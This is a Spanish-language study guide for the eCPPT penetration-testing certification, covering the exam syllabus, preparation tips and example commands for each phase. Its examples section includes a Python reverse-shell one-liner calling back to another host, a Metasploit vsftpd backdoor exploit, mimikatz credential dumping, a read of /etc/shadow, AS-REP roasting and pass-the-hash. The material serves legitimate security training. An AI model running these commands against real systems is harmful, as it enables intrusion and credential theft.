eCPPT

Descripción

El eLearnSecurity Certified Professional Penetration Tester (eCPPT) es una certificación orientada a profesionales de la seguridad que desean demostrar competencias prácticas en pruebas de penetración. La certificación valida habilidades en evaluación de seguridad de redes, aplicaciones web, explotación de vulnerabilidades y reportes profesionales.

  • Duración del curso: Variable según modalidad.
  • Modalidad: Online, práctico y basado en laboratorio.
  • Enfoque: Ejercicios hands-on y escenarios de pentesting reales.
  • Reconocimiento: Internacional, orientado a la práctica más que a la teoría.

Objetivos de la certificación

  • Identificar y explotar vulnerabilidades en sistemas y aplicaciones.
  • Aplicar metodologías profesionales de pentesting.
  • Elaborar informes de seguridad claros, técnicos y profesionales.
  • Mejorar la capacidad de análisis y resolución de problemas en entornos controlados de pruebas.

Contenido clave

  • Reconocimiento y Enumeración
    • Descubrimiento de hosts y servicios.
    • Escaneo de puertos y fingerprinting.
  • Explotación
    • Explotación de servicios vulnerables.
    • Escalada de privilegios en sistemas Windows y Linux.
  • Post-explotación
    • Mantenimiento de acceso.
    • Exfiltración de información.
  • Pentesting Web
    • SQL Injection, XSS, CSRF y vulnerabilidades de lógica de negocio.
    • Uso de herramientas: Burp Suite, OWASP ZAP.
  • Reportes
    • Documentación de hallazgos.
    • Recomendaciones de mitigación y comunicación a clientes.

Metodología de estudio

  • Laboratorios prácticos: Cada módulo contiene escenarios de práctica para replicar entornos reales.
  • Examen práctico: Incluye una máquina o laboratorio que debe ser explotado y reportado.
  • Notas y recursos comunitarios: Acceso a repositorios con ejercicios, scripts y guías.

Recursos y notas de estudio

Consejos de preparación

  • Practicar en entornos controlados y máquinas virtuales.
  • Leer y analizar reportes de pruebas de otros profesionales.
  • Mantenerse actualizado con vulnerabilidades recientes y herramientas de pentesting.
  • Participar en comunidades y foros para resolver dudas y compartir experiencias.
  • Realizar ejercicios de escalada de privilegios, explotación y post-explotación regularmente.

Enlaces relacionados

Temario completo de la certificación eCPPT

1. Información general del temario

El temario oficial de la certificación eCPPT (Certified Professional Penetration Tester) se organiza en dominios y sub‑dominios prácticos que cubren todo el proceso de pruebas de penetración: desde reconocimiento hasta explotación, post‑explotación y reporte profesional. El enfoque es 100% práctico, con énfasis en escenarios reales de pentesting.

2. Dominios del examen (Estructura oficial)

2.1. Information Gathering & Reconnaissance (10%)

  • Descubrimiento de hosts y servicios (Host Discovery).
  • Escaneo de puertos y servicios (Port Scanning).
  • Enumeración de información de servicios abiertos (service enumeration).
  • Enumeración DNS y técnicas avanzadas de reconocimiento.

2.2. Initial Access (15%)

  • Enumeración de usuarios para identificar cuentas válidas.
  • Técnicas de password spraying y ataques de fuerza bruta contra servicios de acceso remoto.
  • Técnicas de acceso inicial a sistemas internos.

2.3. Web Application Penetration Testing (15%)

  • Enumeración y análisis de aplicaciones web para identificar puntos de entrada.
  • Detección y explotación de vulnerabilidades comunes:
    • SQL Injection (SQLi).
    • Cross‑Site Scripting (XSS).
    • Command Injection y otras inyecciones.
  • Ataques de fuerza bruta en formularios de autenticación.
  • Explotación de componentes vulnerables o desactualizados.
  • Exfiltración de datos de aplicaciones y bases de datos.

2.4. Exploitation & Post‑Exploitation (25%)

  • Identificación y explotación de vulnerabilidades o malas configuraciones en servicios.
  • Escalada de privilegios local: Windows y Linux.
  • Dumping y cracking de hashes de contraseñas.
  • Identificación y extracción de credenciales inseguras almacenadas localmente.
  • Persistencia y técnicas de post‑explotación (mantener acceso).

2.5. Exploit Development (5%)

  • Desarrollo o modificación de código de exploit para acceso inicial y post‑explotación.
  • Identificación y explotación de vulnerabilidades de corrupción de memoria (Stack/Buffer Overflows).
  • Técnicas básicas de debugging para exploits.

2.6. Active Directory Penetration Testing (30%)

  • Enumeración completa de entornos Active Directory.
  • Identificación de cuentas de dominio con contraseñas débiles o vacías.
  • Ataques Kerberos: AS‑REP Roasting, Pass‑the‑Hash, Pass‑the‑Ticket.
  • Técnicas de movimiento lateral dentro de la red.
  • Obtención de privilegios de Domain Admin y explotación a nivel dominio.

3. Contenidos temáticos extendidos (basados en curso/recursos)

3.1. Reconocimiento y Scanning

  • Técnicas avanzadas de reconocimiento (DNS enum, servicio fingerprinting).
  • Uso de herramientas: Nmap, Masscan, enum4linux, etc.

3.2. Pentesting de Aplicaciones Web

  • OWASP Top 10 enfoque práctico.
  • Uso de Burp Suite, sqlmap, wfuzz.
  • Validación y explotación manual vs automatizada.

3.3. Explotación de Sistemas

  • Técnicas de explotación en Linux y Windows: Pipes, Shells inversos.
  • Uso de Metasploit y módulos avanzados.

3.4. PowerShell y Scripting

  • Uso de PowerShell para enumeración y post‑explotación.
  • Scripts de automatización para tareas de pentesting.

3.5. Wi‑Fi y Redes Inalámbricas

  • Fundamentos de 802.11.
  • Ataques comunes de Wi‑Fi (de autenticación, fuerza bruta).

3.6. Técnicas Avanzadas de Reporte

  • Formato profesional de reporte de pentesting.
  • Impacto, PoC (Proof of Concept) y recomendaciones de mitigación.

4. Laboratorios y prácticas

  • Laboratorios prácticos hands‑on para aplicar cada dominio del temario.
  • Escenarios reales de pentesting con múltiples vectores de ataque.
  • Integración de flujos completos: reconocimiento → explotación → escalada → reporte.

5. Requisitos previos y habilidades

  • Buen entendimiento de sistemas operativos Windows y Linux.
  • Conocimientos sólidos de redes y protocolos TCP/IP.
  • Experiencia con herramientas de pentesting.
  • Habilidades de scripting básico y lectura/modificación de código.

6. Fuentes oficiales y recursos

Guía de implementaciones para eCPPT: Casos de uso y ejemplos de configuración

1. Reconocimiento y Enumeración

Caso de uso

Descubrir hosts activos y servicios abiertos en una red corporativa antes de realizar un pentest.

Herramientas y ejemplos

  • Nmap
    • Escaneo rápido de red:
nmap -sP 192.168.1.0/24
  • Escaneo de puertos y servicios con detección de versión:
nmap -sV -p 1-65535 192.168.1.10
  • enum4linux (enumeración de usuarios y shares en sistemas Windows):
enum4linux -a 192.168.1.10
  • DNS Recon
    • Enumeración de subdominios con sublist3r:
sublist3r -d ejemplo.com

2. Pentesting Web

Caso de uso

Identificar vulnerabilidades de inyección en una aplicación web de prueba.

Herramientas y ejemplos

  • Burp Suite
    • Configuración de Proxy:
      • Puerto local: 8080
      • Interceptar tráfico de navegador para pruebas.
  • SQLMap
    • Detección y explotación de SQL Injection:
sqlmap -u "http://ejemplo.com/login.php" --forms --batch --risk=3 --level=5
  • wfuzz
    • Fuerza bruta de parámetros o directorios:
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://ejemplo.com/FUZZ

3. Explotación de Sistemas

Caso de uso

Acceso inicial a un host Linux vulnerable y escalada de privilegios.

Herramientas y ejemplos

  • Metasploit Framework
    • Escaneo de vulnerabilidad y explotación:
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.1.15
run
	```

- **Shell inversa en Python**:

```python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("192.168.1.20",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4. Post-explotación

Caso de uso

Recolectar información sensible y mantener persistencia en un host comprometido.

Herramientas y ejemplos

  • Linux
  • Escalado de privilegios:
sudo -l
find / -perm -4000 2>/dev/null
  • Dumping de contraseñas:
grep -i password /etc/shadow
  • Windows
  • PowerShell para enumerar usuarios:
Get-LocalUser
Get-LocalGroupMember Administrators
  • Obtención de hashes con mimikatz:
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords" "exit"'
	```


---

## 5. Active Directory Pentesting
### Caso de uso
Movimientos laterales y escalada en un entorno AD para pruebas internas.

### Herramientas y ejemplos
- **BloodHound**
- Analizar relaciones de privilegios en AD:

```powershell
Invoke-BloodHound -CollectionMethod All -Domain ejemplo.local -ZipFileName data.zip
  • Kerberos Attacks
  • AS-REP Roasting:
GetNPUsers.py ejemplo.local/ -usersfile users.txt
  • Pass-the-Hash:

bash impacket-psexec -hashes <LMHASH>:<NTHASH> user@192.168.1.10


6. Reporting y Documentación

Caso de uso

Generar informes profesionales con hallazgos y recomendaciones.

Ejemplo de estructura de reporte

  • Resumen ejecutivo: Hallazgos críticos y riesgos para el negocio.
  • Metodología: Técnicas y herramientas utilizadas.
  • Hallazgos técnicos: Vulnerabilidades, pruebas PoC, capturas de pantalla.
  • Recomendaciones: Remediaciones y mitigaciones.
  • Apéndices: Scripts, logs y evidencias técnicas.

7. Laboratorios prácticos

  • Configurar VMs de laboratorio con Windows y Linux.
  • Implementar escenarios de vulnerabilidades intencionadas para prácticas de explotación.
  • Integrar flujos completos: Reconocimiento → Explotación → Escalada → Reporte.

8. Buenas prácticas

  • Mantener un entorno aislado para pruebas.
  • Documentar cada paso y comando utilizado.
  • Realizar pruebas repetidas y controladas para validar hallazgos.
  • Actualizar herramientas y scripts antes de cada laboratorio.

Recursos y referencias